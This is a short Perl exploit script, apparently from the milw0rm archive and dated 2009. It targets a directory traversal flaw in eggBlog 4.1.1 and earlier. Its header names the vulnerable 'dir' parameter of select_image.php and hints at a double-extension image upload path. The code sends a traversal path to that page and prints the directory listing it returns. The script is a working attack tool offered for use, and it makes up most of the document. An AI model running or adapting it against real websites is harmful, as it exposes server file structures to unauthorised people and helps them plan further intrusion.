1 #!/usr/bin/perl
2 #
3 # eggBlog <= 4.1.1 Local Directory Transversal Exploit
4 #
5 # by Juri Gianni aka yeat − staker[at]hotmail[dot]it
6 # Visit http://zeroidentity.org
7 #
8 # Description
9 # −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
10 # eggBlog contains one flaw that allows an attacker to
11 # carry out a local directory transversal attack.
12 # The issue is due to ’select_image.php’ script not
13 # properly sanitizing user input supplied to the ’dir’
14 # GET variable.
15 # −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
16 # Note: you may upload image files with double ext on
17 # _lib/openwysiwyg/addons/imagelibrary/insert_image.php
18 # −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
19
20 use LWP::UserAgent;
21
22
23 my $domain = $ARGV[0];
24 my $folder = $ARGV[1] || &usage;
25
26 exploit($folder);
27
28
29 sub usage()
30 {
31 print "eggBlog <= 4.1.1 Local Directory Transversal Exploit\n";
32 print "Usage: perl xpl.pl localhost/eggBlog ../../\n";
33 print "Visit http://zeroidentity.org\n";
34 exit;
35 }
36
37
38 sub exploit()
39 {
40 my $param = shift @_ || die "1 parameter required\n";
41
42 my $response = undef;
43 my @director = undef;
44
45 my $lib = new LWP::UserAgent;
46
47 $lib−>agent(’Lynx (textmode)’);
48 $lib−>timeout(5);
49
50 $response = $lib−>get("http://$domain/_lib/openwysiwyg/addons/imagelibrary/select_image.php?dir=$param");
51
52 @director = $response−>content =~ /<strong>(.+?)<\/strong>/ig;
Page 1/2
eggBlog 4.1.1 Local Directory Transversal Exploit
StAkeR
05/11/2009
53
54 for (my $i=0;$i<=scalar(@director);$i++) {
55 print $director[$i]."\n";
56 }
57 }
58
59 # milw0rm.com [2009−05−11]
Page 2/2
eggBlog 4.1.1 Local Directory Transversal Exploit
StAkeR
05/11/2009